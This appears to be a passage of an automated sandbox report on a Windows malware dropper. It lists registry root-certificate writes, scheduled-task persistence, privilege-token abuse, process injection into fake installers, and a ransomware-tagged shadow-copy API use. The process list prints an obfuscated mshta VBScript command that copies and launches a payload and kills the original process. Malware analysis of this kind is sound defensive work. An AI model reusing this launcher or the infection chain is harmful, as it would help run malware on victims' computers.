C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1548 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 1548 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
PID 1548 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 1548 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 1548 wrote to memory of 184 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
PID 1548 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 1548 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 1548 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
PID 1548 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
PID 1548 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
PID 1548 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
PID 1548 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Windows\syswow64\MsiExec.exe
PID 1548 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Windows\syswow64\MsiExec.exe
PID 1548 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Windows\syswow64\MsiExec.exe
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3608 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 1548 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1548 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1548 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1548 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 1548 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\7.exe
PID 1548 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 1548 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 1548 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
PID 1548 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 1548 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 1548 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 1548 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1548 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 1464 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
PID 1464 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
PID 1464 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp
PID 1548 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 1548 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 1548 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
PID 1548 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 1548 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 1548 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
PID 956 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe C:\Windows\SysWOW64\mshta.exe
PID 956 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe C:\Windows\SysWOW64\mshta.exe
PID 956 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe C:\Windows\SysWOW64\mshta.exe
PID 4348 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
PID 4348 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
PID 4348 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
PID 3660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 3660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 3660 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp C:\Users\Admin\AppData\Local\Temp\setup_2.exe
PID 1548 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
PID 1548 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
PID 1548 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
PID 2416 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
PID 2416 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
PID 2416 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp
PID 2448 wrote to memory of 4744 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe

"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"

C:\Users\Admin\AppData\Local\Temp\inst001.exe

"C:\Users\Admin\AppData\Local\Temp\inst001.exe"

C:\Users\Admin\AppData\Local\Temp\install.exe

"C:\Users\Admin\AppData\Local\Temp\install.exe"

C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv

C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7.exe

"C:\Users\Admin\AppData\Local\Temp\7.exe"

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp" /SL5="$90112,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\lijun-game.exe

"C:\Users\Admin\AppData\Local\Temp\lijun-game.exe"

C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ( "WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" == """" for %z iN ( ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ) )

C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe

"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

